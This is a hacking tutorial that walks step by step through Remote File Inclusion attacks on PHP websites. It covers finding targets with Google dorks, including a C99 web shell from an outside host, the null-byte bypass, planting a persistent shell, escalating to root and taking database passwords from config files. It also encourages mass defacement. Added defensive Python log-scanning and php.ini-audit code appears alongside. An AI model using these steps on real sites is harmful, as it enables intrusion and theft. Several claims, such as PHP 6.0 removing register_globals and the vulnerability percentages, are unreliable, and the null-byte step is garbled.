Hello friends, today I am going to explain an advanced method of hacking
websites: how to hack websites using Remote File Inclusion. As the name
suggests, Remote File Inclusion is a technique where we insert a file (in
hacking terminology called a shell) into the website and get admin rights.
Let's discuss this type of website hacking technique in detail, so friends,
read on...
What is Remote File Inclusion?
Remote File Inclusion is a method of hacking websites and getting the
admin rights of the server by inserting a remote file, usually called a
SHELL (a shell is a graphical user interface file which is used for browsing
the remote files and running your own code on the web servers), into a
website. Its inclusion allows hackers to execute server-side commands as
the currently logged-on user and to have access to all the server files. With
these rights we can continue to use local exploits to escalate our privileges
and get control over the whole server.
Note: Remote File Inclusion (RFI) is the best ever technique to hack
websites, and more than 60% of websites on the internet using PHP are
vulnerable to this attack.
Which Websites are Vulnerable to Remote File Inclusion attack?
The first and most basic question that arises in the mind of new hackers is
how we can find websites that are prone to a remote file inclusion attack, and
what the basic vulnerabilities are that we will target to hack any website
and web server. The answer to these questions is quite simple.
Many web servers are vulnerable to this type of attack because of
PHP's default settings of register_globals and allow_url_fopen being
enabled.
Note: In PHP 6.0, register_globals has been removed, but the second
vulnerability still remains open, so we can give it a try on websites running
the latest version of PHP too. But good news for hackers is that around 90% of
websites on the internet still use old versions of PHP, and more good news is
that among those 90% of websites, more than 60% have the default settings
enabled. That means we can hack most of the websites and deface them. Isn't
that cool? But as I have said, we are ethical hackers, we only find vulnerabilities
Now let's start the step-by-step Remote File Inclusion method to hack websites:
Step 1: Finding the Vulnerable Websites
First of all we have to find a website that loads its pages using the PHP
include() function and is vulnerable to RFI (Remote File Inclusion). The
best technique is to find websites using Google dorks. Google dorks are
simply queries that are used to identify specific search results.
Step 2: Identifying Vulnerable Website
Websites that have a page navigation system similar to the one below:
| http://target-site.com/index.php?page=PageName
Step 3: Checking Website is Vulnerable or Not
To check if the website is vulnerable to a remote file inclusion attack, we
would try to include a website link instead of PageName, as shown below:
|http://target-site.com/index.php?page=http://google.com
Step 4: Remote Inclusion of Shells
Now we know that the website is hackable, so we will now include the shells
into the website. There are a number of shells available online, but my
favorites are C99 and r57 because of their extended functionality and features.
There is no need to download these shells to your systems or PC; we can
directly use the online resources for doing that, but if you wish you can
download them from their respective websites. I will not provide these here
because it's unethical, but Google it and you can find them easily.
To find a shell, the hacker would search Google for:
|inurl:c99.txt
This will display many websites with the shell already up and ready to be
included.
Note: you must include a ? after the URL of the shell so that if anything
comes after c99.txt, it will be passed to the shell and not cause any problems.
For future analysis you can download these shells from here:
Localroot
The new URL with the shell included would look like:
|http://target-site.com/index.php?page=http://site.com/c99.txt?
Step 5: Adding Null Byte
Sometimes the PHP script on the server appends “.php” to the end of every
included file. So if you included the shell, it would end up looking like
“c99.txt.php” and not work. To get around this, you would add a null byte ()
to the end of c99.txt. This tells the server to ignore everything after c99.txt.
Step 6: Vulnerabilities Database
In step one, I told you that hackers use Google dorks to look for sites
possibly vulnerable to RFIs. An example of a Google dork would be:
allinurl:.php?page=
This looks for URLs with .php?page= in them. This is only an example and
you most likely won’t find any vulnerable sites with that search. You can
try switching around the word “page” with other letters and similar
words.
Hackers usually search vulnerability databases like
www.milw0rm.com for already discovered RFI vulnerabilities in site
content management systems and search for websites that are running that
vulnerable web application with a Google dork.
Step 7: If Attack Successful
If we succeed in getting the server to parse the shell, then we will see a
screen similar to the following:
The shell will display information about the remote server and list all the
files and directories on it. From here we would find a directory that has read
and write privileges and upload the shell, but this time as a .php file, so
that in case the vulnerability is fixed, the attacker will be able to access it
later on.
Step 8: Find Root Privileges on Server
Next we would find a way to gain root privileges on the system. We can
do this by uploading and running local exploits against the server. You can
find a list of such exploits on milw0rm. We could also search the victim server
for configuration files. These files most of the time contain usernames and
passwords for the MySQL databases and such.
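From the webmaster's side, the requests described in Steps 3 to 5 leave a recognisable trace in the web server's access log: a query parameter whose value is itself a remote URL, sometimes ending in "?" or carrying an encoded null byte. The following is an added example, not part of the original article; the log lines, IP addresses and hosts are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (common log format); all hosts and IPs are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=http://example.org/ HTTP/1.1" 200 48211
203.0.113.9 - - [10/Oct/2023:13:56:40 +0000] "GET /index.php?page=http%3A%2F%2Fexample.net%2Fc99.txt%3F HTTP/1.1" 200 90312
198.51.100.4 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?page=news%00 HTTP/1.1" 200 5120
198.51.100.5 - - [10/Oct/2023:13:58:03 +0000] "GET /search.php?q=see+http://example.com/docs HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# Only a value that *starts* with a URL scheme is treated as an inclusion attempt,
# so a URL mentioned inside a search phrase is not flagged.
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.I)

def classify_value(value):
    """Return the list of RFI indicators found in one decoded parameter value."""
    findings = []
    if REMOTE_SCHEME_RE.match(value):
        findings.append("remote-url")
        if value.rstrip("\x00").endswith("?"):
            findings.append("trailing-question-mark")
    if "\x00" in value:
        findings.append("null-byte")
    return findings

def scan_log(text):
    """Return (client_ip, parameter, indicators) for each suspicious query parameter."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            value = unquote(value)  # second decode catches double-encoded values
            findings = classify_value(value)
            if findings:
                hits.append((ip, name, findings))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A hit with a 200 response and an unusually large body size, as in the constructed lines above, is worth checking first, since it suggests the remote content was actually fetched and rendered.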
How to Protect your Websites and Forums from Remote File Inclusion attack?
As we are ethical hackers, I will also explain how webmasters can protect
their websites from RFI attacks.
To protect yourself from RFI attacks, simply make sure you are using
up-to-date scripts, and make sure your server's php.ini file has
register_globals and allow_url_fopen disabled.
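A small audit of the php.ini settings named above, as an added example that is not part of the original article. It also reports allow_url_include, which the article does not mention: since PHP 5.2 that directive controls whether include() and require() accept URLs. The php.ini fragment is constructed and the function names are hypothetical.

```python
# Directives the article says to disable, plus allow_url_include (added by this example).
RISKY_WHEN_ON = ("register_globals", "allow_url_fopen", "allow_url_include")
TRUTHY = {"1", "on", "yes", "true"}  # values php.ini treats as boolean true

# Constructed php.ini fragment for the demonstration.
SAMPLE_INI = """\
; constructed sample
[PHP]
register_globals = On
allow_url_fopen = On   ; shipped default
;allow_url_include = On
allow_url_fopen = Off
display_errors = Off
"""

def effective_settings(ini_text):
    """Parse php.ini text into {directive: value}.

    ';' starts a comment and a later assignment replaces an earlier one.
    Directive names are case-sensitive, so keys are kept as written.
    Quoted values containing ';' are not handled; the boolean directives
    audited here never need them.
    """
    settings = {}
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key] = value.strip("\"'").lower()
    return settings

def audit(ini_text):
    """Return {directive: 'on' | 'off' | 'unset'} for the RFI-relevant directives."""
    settings = effective_settings(ini_text)
    report = {}
    for name in RISKY_WHEN_ON:
        if name not in settings:
            report[name] = "unset"  # built-in default applies; it depends on the PHP version
        else:
            report[name] = "on" if settings[name] in TRUTHY else "off"
    return report

if __name__ == "__main__":
    for directive, state in audit(SAMPLE_INI).items():
        print(f"{directive}: {state}")
```

Any directive reported as "on" needs changing, and "unset" should be pinned to Off explicitly rather than left to the version's default.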
Note: Website hacking is illegal, this article is for Educational
purposes only.
Thanks for reading.. Enjoy..!!